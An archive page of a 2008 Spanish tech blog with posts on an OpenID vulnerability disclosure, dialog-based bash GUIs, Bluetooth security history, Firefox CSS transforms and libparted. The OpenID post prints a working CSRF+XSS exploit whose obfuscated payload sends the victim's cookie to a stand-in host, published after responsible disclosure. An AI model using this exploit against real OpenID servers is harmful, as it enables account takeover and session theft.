Archivos para 22 octubre 2008

Problema de seguridad muy grave en el OpenID de Weblogs SL

Seguramente todos conozcáis OpenID, un sistema de identificación digital descentralizado, o dicho de otra forma: una forma de identificarte en una web, si no lo conoces, seguramente te cueste entender este artículo.

OpenID se utiliza en muchos sitios, por ejemplo, cuando pones un comentario en genbeta, necesitas proporcionar una url de OpenID, que sirva para identificarte, si no tienes una, te sugiere que te la crees aquí:

http://openid.blogs.es/

Esa página, te permite identificarte y gestionar la información asociada a tu cuenta OpenID, además, si no tienes una cuenta, puedes crearla ahí mismo.

Como OpenID es descentralizado, cualquiera puede montar su servidor OpenID, como ese que puse arriba, que utilizan en genbeta, y que lo gestiona weblogs sl.

El caso, es que existen muchas implementaciones de OpenID, entre ellas, existe una libre en PHP, alojada aquí. Que como bien dice la propia página, ese software ya no está mantenido, está abandonado.

Sin embargo, en su día fue un script muy popular, y muchos servidores, no solo weblogs sl, sino también openid.es utilizan ese script.

Al ver que estaba tan extendido, decidí auditarlo, me bajé el código, y encontré varios errores MUY graves, seguramente el mas notable es un CSRF, que haciendo una petición POST, nos permite modificar los datos del usuario, sin ningún tipo de número de control o comprobación sobre el referer.

Esto, sumado a que uno de los campos del perfil del usuario, de los que podemos alterar con el CSRF, tiene un bug XSS que nos permite inyectar código, hace que podamos imaginarnos un ataque así:

  1. La victima visita una web
  2. La web crea un iframe invisible, donde se carga un document HTML que hace una petición post al OpenID, pidiendo cambiar su información asociada a su cuenta, en este caso, su nombre, que es el campo que tiene XSS, el que nos permite inyectar código HTML
  3. Se modifica el nombre y apellidos asociado a la cuenta de la víctima, sin que esta vea nada
  4. Se ejecuta el código Javascript inyectado en el campo nombre, redireccionado a la víctima a una web de terceros, y pasando la cookie vía GET, para recogerla en el otro lado

Con esto, podemos robar cualquier cuenta de OpenID (en un servidor que utilice esta implementación vulnerable) solo con que una persona autenticada en OpenID, visite nuestra web.

Como se habla mucho de bugs de este tipo, y nunca se dan ejemplos, me decidí a crear un exploit, un archivo html, que al visitarlo estando logueado en http://openid.blogs.es/, te roba la cookie y la envía a otra web (a http://www.e.com, es una web ficticia), el código es algo así:

<html>
<head>
<script>
function attack() {
//document.location=”http://www.e.com/?c=”+document.cookie;
//encoded
document.getElementById(‘profilename’).value = ‘”><script>eval(String.fromCharCode(100,111,99,117,109,101,
110,116,46,108,111,99,97,116,105,111,110,61,34,104,116,116,
112,58,47,47,119,119,119,46,101,46,99,111,109,47,63,99,61,34,
43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,
59));<\/script>';
document.forms[0].submit();
}
</script>
</head>
<body onload=”attack();”>
<form method=”POST” action=”http://openid.blogs.es”&gt;
<input type=”hidden” name=”action” value=”account”/>
<input type=”hidden” id=”profilename” name=”profile[fullname]” value=””/>
</form>
</body>
</html>

Podéis bajarlo en texto plano aquí:

exploit

Sin embargo, al ver la peligrosidad de este agujero de seguridad, decidí contactar con Julio Alonso, de Weblogs SL, quien me pasó con su CTO, un tal “Klaas Naaijkens”, le expliqué el problema, le pasé el exploit de demostración, y en un día estaba solventado.

Sin embargo, esa implementación de OpenID tiene aún algunos CSRF peligrosos, pero el bug mas serio ya está parcheado.

Esto me lleva a una pregunta: ¿Es que nadie mas ha auditado nunca el servidor OpenID que utilizan blogs tan importantes como genbeta? Me imagino que no.

Al menos me siento bien, he contribuido a solventar un bug bastante importante, lo único malo, es que el software ya no lo mantiene nadie, y no consigo contactar con el autor, para que haga un parche que puedan utilizar todos los sites que utilicen este software.

Un saludo a Klaas y a Julio, que han sido muy atentos y han solventado el bug muy rapidamente, así que el tiempo desde que encontré la vulnerabilidad, hasta que estubo solventada, fue muy pequeño, ojalá fuese siempre así.

Interfaces gráficas al vuelo

Sin lugar a dudas, la tarea mas tediosa de crear un programa, es crear la interfaz gráfica, sobretodo cuando el programa es un script hecho en un rato, que pretende resolver alguna necesidad puntual, de forma sencilla y concisa.

Normalmente, nos encontramos que para crear un par de ventanas preguntando algo al user y eliminar algún archivo y crear una carpeta, tenemos que programar 4 lineas para lo que de verdad hace el programa, y 40 para la interfaz gráfica.

Para evitar esto, nació dialog, una pequeña aplicación que al ser ejecutada, permite pasarle ciertos parámetros que le indican como debe pintar una ventana, la dibuja, y según lo que haga el usuario, el comando devuelve una cosa u otra.

Para entrar mas en detalle, probamos el siguiente comando:

dialog –stdout –title “Selecciona un archivo” –fselect $HOME/ 14 48

Esto nos dibuja una ventana mediante ncurses, que nos permite seleccionar un fichero.

Utilizando esto, se pueden crear pequeños scripts en bash, por ejemplo, que realicen tareas y permitan interactuar al usuario.

Como la idea tubo bastante éxito, se creó Xdialog, que hace lo mismo pero pintando ventanas con GTK, y kdialog que hace lo mismo pero pintando ventanas mediante Qt.

Como para entender las cosas, lo mejor es un buen ejemplo, he creado un pequeño script en bash, que primero comprueba si estamos en las X, si no lo estamos, utiliza dialog, si lo estamos, comprueba si tenemos kdialog para utilizarlo, y si no lo tenemos, usa Xdialog.

#!/bin/bash

if [ -z $DISPLAY ]
then
DIALOG=dialog
else
if command -v kdialog &>/dev/null
then
DIALOG=kdialog
else
DIALOG=Xdialog
fi
fi

$DIALOG –title “Mi primer dialogo” \
–yesno “Si o no?” 10 30

case $? in
0)
echo “Has escogido si!!”;;
1)
echo “Has escodigo no!!”;;
255)
echo “Has cerrado el dialogo, sin decir si o no!!”;;
esac

Este script hace una pregunta, y luego printea por consola la respuesta que hemos escodigo.

Y este es el resultado que vemos usando kdialog.

Otro script que pregunta al usuario por su nombre, y muestra una caja de entrada:

#!/bin/bash

if [ -z $DISPLAY ]
then
DIALOG=dialog
else
if command -v kdialog &>/dev/null
then
DIALOG=kdialog
else
DIALOG=Xdialog
fi
fi

tempfile=`tempfile 2>/dev/null` || tempfile=/tmp/test$$
trap “rm -f $tempfile” 0 1 2 5 15

$DIALOG –title “Un ejemplo con una caja de entrada” \
–inputbox “Caja de entrada de ejemplo:” 16 51 2> $tempfile

retval=$?

case $retval in
0)
echo “Input string is `cat $tempfile`”;;
1)
echo “Cancel pressed.”;;
255)
if test -s $tempfile ; then
cat $tempfile
else
echo “ESC pressed.”
fi
;;
esac

Cabe decir que kdialog no es completamente compatible con dialog y Xdialog, por lo que puede que os encontréis con problemas al intentar utilizar uno u otro de forma transparente.

Como curiosidad, conozco un par de scripts interesantes hechos con dialog, uno de ellos es un script hecho por un conocido mio, que sirve para crackear redes wireless que utilicen seguridad WEP, sin tener que teclear ningún comando:

Airfoncrack

Y aquí tenemos otro ejemplo de como utilizar kdialog y curl para crear una aplicación visual que permite agregar notas a twitter.

Un vistazo profundo a bluetooth y su seguridad

Como ya he dicho en anteriores entradas, la seguridad es una ciencia a la merced de las modas, a diferencia de lo que cree mucha gente, no existe nadie que se asegure de que todo sea seguro, no existen mil ojos mirando cada código de software libre, ni existen mil ojos mirando cada nuevo protocolo, no es así.

En realidad, hay poca gente que audite código, hay poca gente que se baje el código de openssl, y le busque problemas de seguridad, y la poca gente que hay: se mueve por modas. (o intereses comerciales)

Si digo todo esto, es por que mientras que a bluetooth no se le han encontrado prácticamente problemas de seguridad reales, a las redes wireless (802.11) se le han encontrado una gran cantidad de ellos.

Esto podría llevarnos a pensar que bluetooth es mas seguro que 802.11, pero en realidad no es así, en realidad es que bluetooth no lo ha examinado casi nadie a fondo, y 802.11 tiene mil ojos encima.

Y sobre eso va a tratar este artículo, sobre como funciona bluetooth y que posibles problemas de seguridad tiene.

Bluetooth es un protocolo de comunicación inalámbrica de corto alcance, es decir, un protocolo que permite comunicar sin cables, distintos dispositivos que estén cerca el uno del otro, diseñado y mantenido por el “SIG” (Bluetooth Special Interest Group) el cual es una asociación de empresas las cuales tienen un interés en esta tecnología.

Dicho de otra manera mucho mas coloquial: bluetooth es como una pequeña red wireless de corto alcance.

En nuestra vida real, estamos rodeados de bluetooth por todas partes, se suele utilizar en dispositivos de manos libre, auriculares, teclados…y sobretodo, con mucha diferencia, en móviles.

En los móviles es donde mas éxito ha tenido bluetooth, ya que permite que dos móviles intercambien datos (fotos, música, contactos…) de forma fácil y rápida, además permite que puedas acceder a los archivos de tu móvil desde tu ordenador.

Bluetooth en realidad, es una pila de protocolos, siendo el protocolo de mas abajo el que se encarga de los temas de ondas de radio etc y los protocolos de mas arriba los que se encargan de direccionamiento, datos, etc.

Empezando por abajo en la pila, tenemos el protocolo “Bluetooth Radio”, el cual define como funciona la parte de radio de bluetooth, entre otras cosas define que bluetooth funciona a 2.4GHz, la misma frecuencia que utiliza 802.11.

Una vez dos dispositivos se entienden, por que utilizan la misma frecuencia y reglas definidas por “Bluetooth Radio”, existen dos protocolos en bluetooth que ya pueden funcionar cuando se cumple ese protocolo: LMP y L2CAP.

LMP es el protocolo que se encarga de la conectividad entre dos dispositivos bluetooth, temas de calidad del servicio, etc.

Una característica importante de LMP, es que bluetooth se mueven entre 79 frecuencias diferentes, separadas cada una por 1mhz, cuando dos dispositivos bluetooth quieren hablarse por radio, primero hablan mediante una frecuencia predefinida, conocida como “control channel” (canal de control) y usando ese canal, acuerdan en que orden van a utilizar las 79 frecuencias disponibles, esto significa, que se ponen de acuerdo, por ejemplo, en decir: te enviaré el primer paquete por la 39, el segundo por la 45, el tercero por la 78…y así hasta utilizar los 79 canales y volver a empezar la secuencia.

La secuencia utilizado, se genera de forma aleatoria y se ponen de acuerdo en cual usar, mediante el canal de control, esta técnica se conoce como FHSS.

Bluetooth utiliza este mecanismo de ir saltando entre frecuencias, para complicar (como veremos mas adelante) el tema de que alguien se ponga a sniffear la conversación entre dos dispositivos.

Una vez LMP ha establecido el enlace radio, entre dos dispositivos, entra en juego el siguiente protocolo, L2CAP.

L2CAP es un protocolo que define una serie de puertos que se pueden utilizar para mandar y recibir datos mediante las capas de abajo, es decir, define una forma en la que varias aplicaciones pueden enviar datos y recibir datos utilizando las ondas de radio de bluetooth, sin confundir de quien es que, de la misma forma que tcp/ip permite que una misma ip, pueda enviar y recibir datos por el mismo cable, para distintas aplicaciones a la vez, haciendo uso de los “puertos”, por ejemplo, servidores web utilizan el puerto 80, y así, el tráfico de la web, se puede distinguir del tráfico ftp, que va por el puerto 21, aunque en realidad, todo son pulsos eléctricos por el mismo cable.

L2CAP dispone de 32767 puertos, disponibles para que las aplicaciones los utilicen, al comunicarse mediante bluetooth.

Y ya por encima de L2CAP trabaja RFCOMM un protocolo que emula las conexiones por puerto serie, dispone de 30 puertos (1 al 30) y solo puede gestionar 6 conexiones como máximo a la vez.

Supongo que después de toda al explicación, uno anda un poco perdido, pero para simplificarlo, voy a hacer una equivalencia entre las redes cableadas normales, y bluetooth, para que se vea claramente donde encaja y que hace cada protocolo:

  • “Blueooth Radio” sería el cable en si mismo
  • L2CAP sería ethernet
  • RFCOMM sería TCP/IP

Por lo cual, a las aplicaciones que se comunican usando bluetooth, les suele preocupar únicamente RFCOMM, igual que a tu navegador, le preocupa tcp/ip, y no si por debajo hay bluetooth, ethernet, o una red wireless 802.11.

Hay un concepto que nos hemos dejado en el aire, y que aparece en el gráfico: Host Controller Interface (HCI).

El HCI es la forma en la que el ordenador (o el móvil) se comunica con el dispositivo bluetooth, es decir, los dispositivos bluetooth, por ejemplo esos pequeños dispositivos usb que conectas a tu ordenador para disponer de bluetooth, tienen dentro un microprocesador, una memoria, registros, y areas de memoria donde se almacena un pequeño programa, llamado firmware, que se ejecuta dentro del procesador que tiene dentro el bluetooth, y que se encarga del tema del LMP, los saltos entre frecuencia, la conectividad por radio, etc, todos los temas de radiofrecuencia a bajo nivel.

Mientras que el L2CAP se ejecuta en el ordenador, no en el dispositivo usb, por lo cual debe existir una forma de comunicar el ordenador y con el dispositivo usb, que es quien gestiona los temas de radio.

Ese protocolo se llama HCI, para verlo mas claro:

Como se puede observar, podríamos resumir una conexión bluetooth como:

  1. Un programa en el ordenador, pide conectarse a un dispositivo bluetooth, en el puerto X
  2. La librería bluetooth del sistema, habla con el driver bluetooth
  3. El driver bluetooth, mediante HCI, habla con el dispositivo bluetooth conectado al USB
  4. El dispositivo bluetooth, inicia una comunicación por radio con el dispositivo al que queremos conectar.
  5. Mediante el canal de control, acuerdan el orden en el que van a utilizar las 79 frecuencias de radio que tienen disponibles.
  6. Ya tienen conectividad, por lo que la aplicación puede enviar datos mediante bluetooth, los cuales los recibirá el driver bluetooth, e irán a parar mediante el HCI (el enlace entre el dispositivo y el ordenador) al dispositivo bluetooth, que los convertirá en ondas de radio, y llegarán al otro dispositivo, donde sucederá todo el camino, a la inversa, hasta llegar a la aplicación que está escuchando en el otro lado.

Despues de haber visto como funciona bluetooth, sabemos que es algo muy similar a ethernet+tcp/ip, aunque con ciertas particularidades.

En primer lugar, bluetooth nos permite escanear los dispositivos que hay alrededor nuestro con bluetooth habilitado, para poder comunicarnos con ellos, sin embargo bluetooth no existen direcciones IP, se usan las direcciones MAC de los dispositivos directamente, el problema es que los seres humanos tienen problemas para memorizar direcciones IP, en el caso de TCP/IP y direcciones MAC, en el caso de bluetooth, por lo que si escaneamos en busca de dispositivos cercanos, para transferir una foto al móvil de un amigo, y nos aparecen direcciones MAC, no sabremos de todos los que aparezcan, cual es el móvil de nuestro amigo.

Por ello, bluetooth dispone de un concepto llamado “Nombre de dispositivo”, cuando un dispositivo bluetooth escanea en busca de dispositivos bluetooth cercanos, los dispositivos cercanos que contestan al escaneo, le indican cual es su nombre de dispositivo, y ese será el que aparezca en la lista, una vez finalizado el escaneo.

El nombre de dispositivo, es algo que puede configurar el usuario, en telefonía móvil, por defecto, el nombre de dispositivo es el modelo del teléfono, por ejemplo: Nokia N70.

Una vez el dispositivo tiene una lista de los dispositivos cercanos, puede consultar que “servicios” provee un determinado dispositivo, es decir, de la misma forma que un ordenador puede tener un servidor web instalado, un dispositivo bluetooth puede tener servicios que se pueden utilizar a través de el, o dicho de otra forma: existe un ftp a través de bluetooth, y se llama OBEX.

Obex es un pequeño protocolo que especifica como intercambiar archivos entre dos dispositivos bluetooth, todos los móviles modernos llevan instalado un servidor obex en algún puerto RFCOMM.

Sin embargo, como solo existen 30 puertos RFCOMM (el equivalente a tcp/ip en bluetooth), a diferencia de ftp, que se utiliza normalmente el puerto 21, no existe ningún puerto por defecto para Obex FTP, ya que hay muchos mas protocolos (no solo existe obex) que funcionan sobre bluetooth, que puertos disponibles tienen rfcomm (30), así que lo que se hace, es que existe un servicio llamado SDP que está instalado en todos los dispositivos bluetooth, y que cualquier otro dispositivo bluetooth, se puede conectar a el, y consultar que servicios tiene un dispositivo, y en que puertos rfcomm están.

Para salir un poco de tanta teoría, usando un dispositivo bluetooth usb, voy a conectarme al servicio SDP de mi móvil (un LG KU380) para consultar que servidores accesibles desde bluetooth tiene instalados, y en que puertos están.

Para ello, lo primero que voy a hacer es escanear en busca de dispositivos bluetooth cercanos:

jcarlosn@localhost:~$ hcitool scan
Scanning …
00:1F:6B:E2:24:96    Rooibo
jcarlosn@localhost:~$

Me aparece mi móvil, que tiene de nombre de dispositivo: Rooibo, y su dirección MAC: 00:1F:6B:E2:24:96, ahora, sabiendo su dirección MAC, puedo conectarme a su servidor SDP, y consultar que servicios tiene:

jcarlosn@localhost:~$ sdptool browse 00:1F:6B:E2:24:96
Browsing 00:1F:6B:E2:24:96 …
Service Name: OBEX Object Push
Service RecHandle: 0x10000
Service Class ID List:
“OBEX Object Push” (0x1105)
Protocol Descriptor List:
“L2CAP” (0x0100)
“RFCOMM” (0x0003)
Channel: 6
“OBEX” (0x0008)
Language Base Attr List:
code_ISO639: 0x656e
encoding:    0x6a
base_offset: 0x100
Profile Descriptor List:
“OBEX Object Push” (0x1105)
Version: 0x0100

Service Name: OBEX File Transfer
Service RecHandle: 0x10001
Service Class ID List:
“OBEX File Transfer” (0x1106)
Protocol Descriptor List:
“L2CAP” (0x0100)
RFCOMM” (0x0003)
Channel: 7
“OBEX” (0x0008)
Language Base Attr List:
code_ISO639: 0x656e
encoding:    0x6a
base_offset: 0x100
Profile Descriptor List:
“OBEX File Transfer” (0x1106)
Version: 0x0100

Service Name: LG Sync SPP
Service RecHandle: 0x10002
Service Class ID List:
“Serial Port” (0x1101)
Protocol Descriptor List:
“L2CAP” (0x0100)
“RFCOMM” (0x0003)
Channel: 16
Language Base Attr List:
code_ISO639: 0x656e
encoding:    0x6a
base_offset: 0x100
Profile Descriptor List:
“Serial Port” (0x1101)
Version: 0x0100

Service Name: LG Audio Gateway
Service RecHandle: 0x10003
Service Class ID List:
“Headset Audio Gateway” (0x1112)
“Generic Audio” (0x1203)
Protocol Descriptor List:
“L2CAP” (0x0100)
“RFCOMM” (0x0003)
Channel: 3
Language Base Attr List:
code_ISO639: 0x656e
encoding:    0x6a
base_offset: 0x100
Profile Descriptor List:
“Headset” (0x1108)
Version: 0x0100

Service Name: LG Audio Gateway
Service RecHandle: 0x10004
Service Class ID List:
“Handsfree Audio Gateway” (0x111f)
“Generic Audio” (0x1203)
Protocol Descriptor List:
“L2CAP” (0x0100)
“RFCOMM” (0x0003)
Channel: 4
Language Base Attr List:
code_ISO639: 0x656e
encoding:    0x6a
base_offset: 0x100
Profile Descriptor List:
“Handsfree” (0x111e)
Version: 0x0105

Service Name: LG Dial-up Networking
Service RecHandle: 0x10005
Service Class ID List:
“Dialup Networking” (0x1103)
Protocol Descriptor List:
“L2CAP” (0x0100)
“RFCOMM” (0x0003)
Channel: 8
Language Base Attr List:
code_ISO639: 0x656e
encoding:    0x6a
base_offset: 0x100
Profile Descriptor List:
“Dialup Networking” (0x1103)
Version: 0x0100

jcarlosn@localhost:~$

Son muchos servicios, pero si nos fijamos en lo que he puesto en negrita, podemos ver que hay un servidor OBEX FTP en el puerto 7 rfcomm.

Ademas hay otro servidor OBEX Object Push en el puerto 6, este otro protocolo también de obex, es similar a OBEX FTP (el cual es muy similar a un servidor ftp normal) pero mas simple, no permite listar el contenido de los directorios, y permite simplemente transferir archivos de uno en uno, estilo tftp.

Obex FTP se utiliza, normalmente, para comunicar el ordenador con el móvil, creando un directorio virtual, donde el contenido que vemos, es el del teléfono, mientras que Obex Object Push, se utiliza habitualmente para transferir contactos, imágenes, música, etc… entre dos móviles.

Sin embargo, tener en el móvil algo similar a un servidor ftp, y algo similar a un servidor TFTP, puede parecer peligroso, sin embargo, el móvil no permite que nadie se conecte a su servidor Obex Object Push, si el dueño del teléfono no acepta la conexión (le aparece una pregunta por pantalla, de si quiere aceptar el archivo), y para mas seguridad, para aceptar una conexión al servidor Obex FTP, se ha de introducir un número en el móvil, que hace las veces de contraseña, y luego introducir el mismo número en el dispositivo que intenta conectarse al servidor Obex FTP.

Es decir, que cuando a alguien le aparece en el móvil que existe un dispositivo que intenta conectarse a el (a su servidor Obex FTP) el dueño del móvil debe aceptarlo, y además, deberá pensar algún número aleatorio, e introducirlo en la caja de texto que le aparece, entonces, debe introducirse ese mismo número, en el dispositivo que intenta conectar.

Ese número se utiliza para cifrar los datos de la conexión.

Ahora que ya sabemos como va todo esto, podemos echar un vistazo al pasado…

Seguramente todos habéis oído hablar de vulnerabilidades que permiten robar información de los móviles vía bluetooth, la forma mas famosa es conocida como “bluesnarf“, la cual se basa en que algunos viejos móviles no requerían que el dueño del teléfono aceptase la conexión, para que un tercero, se conectase a su servidor Obex Object Push.

Por lo cual, lo que hacían era conectarse a tu teléfono vía bluetooth, consultar el servicio sdp para saber si hay algún servidor Obex Object Push, y saber en que puerto está, conectarse a el, y pedir los archivos de la libreta de contactos, los sms, etc…así de simple, simplemente se basa en utilizar un servidor instalado en el móvil, en un puerto bluetooth.

Ademas, algunos móviles permiten que se les envíen contactos vía bluetooth sin requerir confirmación, y ahí nació otro conecto: el bluejacking.

El bluejacking, a diferencia del bluesnarfing, no busca robar información de nadie, simplemente se basa en que alguien coge un móvil, va por la calle escaneando en busca de dispositivos bluetooth cercanos, y cuando encuentra alguno, le manda un contacto vía Obex Object Push, y en el nombre del contacto, pone alguna frase. Cuando el otro lo recibe y lo ve, lee la frase que hay en el campo nombre.

A raíz de esto aparecieron pequeñas aplicaciones (midlets) en java para móviles, que permiten definir un mensaje, y escanean sin parar vía bluetooth, envíando ese mensaje en forma de contacto, a todos los móviles con los que te cruzas. Una de ellas es EasyJack, disponible aquí.

Cuando los fabricantes de telefonos móviles reaccionaron, y empezaron a requerir que el usuario acepte la conexiones al servidor Obex Object Push, y que haga falta poner un PIN y todo eso, para conectar al servidor Obex FTP del telefono, el hacking a dispositivos bluetooth pasó a ser historia del pasado.

Sin embargo, se crearon algunas nuevas ideas para atacar móviles con bluetooth, la primera es el DoS, que consiste en buscar formas de clavar o congelar el móvil, a base de mandarle paquetes L2CAP malformados, o cosas similares.

Entorno a esta idéa, salieron varios bugs publicados, como este, que envíando paquetes L2CAP malformados, el móvil se congela hasta que lo reinicies.

Además, apareció una herramienta para GNU/Linux que, llamada bss, que crear paquetes L2CAP malformados sin parar, y los envía a la dirección bluetooth que le indiques, si en algún momento el móvil le deja de contestar los paquetes bluetooth, te dice el paquete que ha provocado que el móvil pete, con esta herramienta sacaron la mayoría de bugs de DoS a móviles.

La otra vertiente por la que se empezó a explorar la seguridad bluetooth, fue la de que ya que bluetooth son ondas de radio, nada nos debería impedir poder sniffear todas las ondas que llegan a nuestro receptor, y de ahí, espiar conversaciones bluetooth, etc.

Sin embargo, para eso existe un problema, el FHSS comentado mas arriba, es decir, el hecho de que bluetooth utiliza 79 frecuencias diferentes, entre las que va saltando de forma aleatoria, y solo el emisor y el receptor que acordaron esos saltos, saben el orden en el que se producen.

Para un dispositivo bluetooth normal, es imposible escuchar en 79 frecuencias distintas a la vez, por las que pueden estar saltando el emisor y el receptor, y a menos que conozca el orden en el que saltan, no conseguirá nada.

Sin embargo, había gente que insinuaba que se podía sniffear usando un dispositivo bluetooth normal, aún y con el problema de las 79 frecuencias, por lo cual, Max Moser, se decidió a escribir un pdf intentando desvelar si eso era posible o no.

En el PDF, utiliza un producto privativo, llamado FTS4BT, de la empresa FrontLine, que consiste en un firmware modificado para los bluetooth con chipset CSR (Cambridge Silicon Radio), un driver .sys para windows, y un programa que interactúa con el driver.

Después de eso, no tardó en aparecer un tutorial paso a paso para linux para modificar tu bluetooth usb con ese firmware.

Al poco tiempo, salió un nuevo paper sobre el tema, bastante mas completo, y muchísimo mas técnico, bastante interesante.

Y hasta aquí ha llegado la ciencia de la seguridad en bluetooth, hace relativamente poco (un año) que el sniffing en bluetooth es algo extendido, por lo cual, habrá que esperar que se consigue con esta nueva posibilidad.

La verdad, es que he intentado hacer este documento lo mas simple posible, pero creo que no lo he conseguido, en el fondo es un tema complejo, aunque espero haber contribuido un poco en un tema tan indocumentado como este.

Transformaciones CSS agregadas en Firefox 3.1

La web 2.0 requiere cada vez tecnologías mas potentes en los navegadores, requiere que el javascript se ejecute mas y mas rápido, y requiere nuevos y mejores elementos html, y en toda esta carrera por superar las barreras impuestas por las tecnologías en los navegadores, uno de los últimos pasos han sido los “CSS transforms”, o dicho mas llanamente: Transformaciones CSS.

La transformaciones CSS son unas nuevas propiedades disponibles para utilizar en nuestras hojas de estilo, propuestas por el equipo de WebKit hace un año, dichas propiedades permitirían aplicar ciertos efectos, como rotaciones y escalados, a nuestros elementos HTML.

Las primeras noticias acerca de estas nuevas propiedades CSS (no estándares, evidentemente) que salieron para WebKit incluían ciertos ejemplos de lo que se podía hacer, bastante atractivos, como crear un iframe, cargar una página dentro, y rotarlo 90º:

Sin embargo, el hecho de que no estuviesen disponibles en Firefox, era desalentador, hasta hace poco, que mozilla anunció que las transformaciones CSS estaban ya disponibles en firefox 3.1.

Antes de continuar, si queréis bajar el último firefox 3.1, y probarlo, se puede descargar precompilado de aquí:

http://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/latest-trunk/

Si no queremos que esto afecte a nuestra configuración actual de firefox, en linux podemos hacer:

mv ~/.mozilla ~/.mozillaBack

Y renombrar el nombre del directorio donde se guardan nuestras configuraciones de firefox, a .mozillBack, ahora extraemos el firefox 3.1 precompilado, lo ejecutamos, y el creará su nuevo .mozilla, el cual podremos borrar y sustituir por nuestro .mozillaBack en cuanto queramos regresar a firefox estable, haciendo:

mv ~/.mozillaBack ~/.mozilla

Con nuestro nuevo firefox 3.1 listo, ya podemos adentrarnos un poco mas en las transformaciones CSS, la documentación completa de estas nuevas propiedades CSS está aquí:

http://developer.mozilla.org/En/CSS/CSS_transform_functions

Así que vamos a probar a hacer algo, por ejemplo, rotar un iframe 45º sobre si mismo:

<html>
<head>
<title>Prueba de rotación</title>
</head>
<body>
<iframe style=”-moz-transform: rotate(45deg); -moz-transform-origin: bottom left;” src=”http://rooibo.wordpress.com/&#8221; width=”600px” height=”600px” />
</body>
</html>

La verdad es que es bastante fácil, aquí podéis verlo en funcionamiento:

http://eyeideas.es/rotacion.html

Y aquí una imagen de como se me renderiza a mi en mi Firefox 3.1:

Los resultados son bastante buenos, habrá que esperar a ver cuanto se extienden estas nuevas propiedades CSS, que hace Internet Explorer y todo eso…el clásico problema en el mundo de los navegadores.

Utilizando libparted para obtener información de nuestros discos

Pese a que en este blog normalmente solo escribe Jose Carlos (vosotros le llamáis rooibo), a partir de ahora yo también iré escribiendo de vez en cuando, a ver si así esto coge un poco mas de vida, ya que Jose Carlos no siempre tiene tiempo. Me llamo Noemi y a pesar de que es la primera vez que escribo en un blog como este (bueno, mas bien es la primera vez que escribo en un blog que no se hable solo de curiosidades tonterías) espero estar a la altura.

Libparted es una librería desarrollada en C por el proyecto GNU, la cual estoy utilizando casi a diario en el nuevo proyecto que estamos llevando a cabo Jose Carlos y yo.

Se trata de una librería que nos permite desde listar hasta crear, borrar y modificar particiones. Fue desarrollada para el programa parted, cuya versión gráfica y más conocida es gparted

Para instalar libparted en sistemas basados en debian (como ubuntu):

apt-get install libparted1.8-dev

Una vez instalada, podemos empezar a utilizarla desde nuestros programas, pero antes de entrar en detalle, mejor empezar con un ejemplo:

#include <stdio.h>
#include <parted/parted.h>
#define MEGABYTE 1048576

int main (void)
{
PedDevice* device = NULL;
PedDisk* disk = NULL;
PedPartition* part = NULL;
PedGeometry geom;

unsigned long size;
double length;
PedSector p_size;
char *fsname;

ped_device_probe_all ();

while ((device = ped_device_get_next(device))) {
disk = ped_disk_new(device);
p_size = device->length;
size = p_size/MEGABYTE;
size = size * device->sector_size;
printf(“%s name: %s size: %uMB\n”,device->path,device->model,size);

for (part = ped_disk_next_partition (disk, NULL); part;
part = ped_disk_next_partition (disk, part)) {
geom = part->geom;
length = (double)geom.length/MEGABYTE*device->sector_size;
if(part->fs_type) {
fsname = (char*)part->fs_type->name;
} else {
fsname = “Uknown”;
}

//if(part->num > 0) {
printf(“\t%s%d %10.2fMB %s\n”,device->path, part->num,length,fsname);
//}
}

}
return 0;
}

para compilarlo es suficiente poner

gcc -lparted test.c -o test

Al ejecutarlo nos muestra una lista con nuestros discos y sus particiones (debemos ejecutarlo como root ya que libparted utiliza instrucciones a bajo nivel que requieren privilegios de administrador para funcionar)

andr0med:/home/ap0# ./test
/dev/sda name: ATA Hitachi HTS54161 size: 152576MB
/dev/sda1  146389.14MB ext3
/dev/sda2    6236.17MB Uknown
/dev/sda5    6236.14MB linux-swap
andr0med:/home/ap0#

Si miramos el código, vemos que hay dos bucles anidados (uno dentro de otro), el primero es el que lee los discos mientras que el que está dentro se encarga de iterar sobre las particiones de cada disco leído.

Lo primero que tenemos que hacer es incluir la librería

#include <parted/parted.h>

Libparted necesita escanear el sistema busca de dispositivos de almacenamiento, para ello llamamos a ped_device_probe_all:

ped_device_probe_all ();

A continuación, creamos un bucle que itera sobre ped_device_get_next, obteniendo el siguiente dispositivo cada vez que es llamada la función. Cuando no queden mas dispositivos, la función devuelve NULL y el bucle finaliza:

while ((device = ped_device_get_next(device)))

con ped_disk_new(device) a partir de un dispositivo creamos un disco para poder tratarlo como tal

disk = ped_disk_new(device);

con esto obtenemos el tamaño del disco en megabytes

p_size = device->length;
size = p_size/MEGABYTE;
size = size * device->sector_size;

de esta forma ya podemos printear nuestro disco por pantalla con su ruta en el sistema(device->path), modelo(device->model) y su tamaño en MB (size)

printf(“%s name: %s size: %uMB\n”,device->path,device->model,size);

terminado esto, entramos en el segundo bucle el cual hace lo mismo que el primero pero en este caso llamando a las diferentes particiones de nuestro disco

for (part = ped_disk_next_partition (disk, NULL); part;
part = ped_disk_next_partition (disk, part))

Como veis, es un bucle exactamente igual, pero esta vez llamando a ped_disk_next_partition. Calculamos el tamaño de cada partición encontrada en el disco, de la misma forma que hacemos para calcular el tamaño de cada disco:

length = (double)geom.length/MEGABYTE*device->sector_size;

A continuación, comprobamos si la partición tiene un sistema de archivos conocido, en caso contrario lo llamamos Uknown

if(part->fs_type) {
fsname = (char*)part->fs_type->name;
} else {
fsname = “Uknown”;
}

finalmente, printeamos nuestras particiones filtrándolas

if(part->num > 0) {
printf(“\t%s%d %10.2fMB %s\n”,device->path, part->num,length,fsname);
}

Esta condición que comprueba si el número de partición es mayor que 0, es necesaria para impedir que se muestren por pantalla particiones inexistentes por pantalla, ya que ninguna partición está identificada por un número negativo, veamos que pasa si quitamos el condicional:

andr0med:/home/ap0# ./test
/dev/sda name: ATA Hitachi HTS54161 size: 152576MB
/dev/sda-1       0.03MB Uknown
/dev/sda1  146389.14MB ext3
/dev/sda2    6236.17MB Uknown
/dev/sda-1       0.03MB Uknown
/dev/sda5    6236.14MB linux-swap
/dev/sda-1       2.49MB Uknown
andr0med:/home/ap0#

Esto es solo una pequeña parte de lo que se puede hacer con libparted, en un futuro ya volveré a hablar de ella.

Clickjacking a fondo y con ejemplos

Hoy voy a cumplir un poco con mi fama de obsesionado por la seguridad, y voy a escribir un artículo sobre clickjacking, ese extraño y misterioso término que no para de aparecer por la blogosfera y las páginas de noticias…

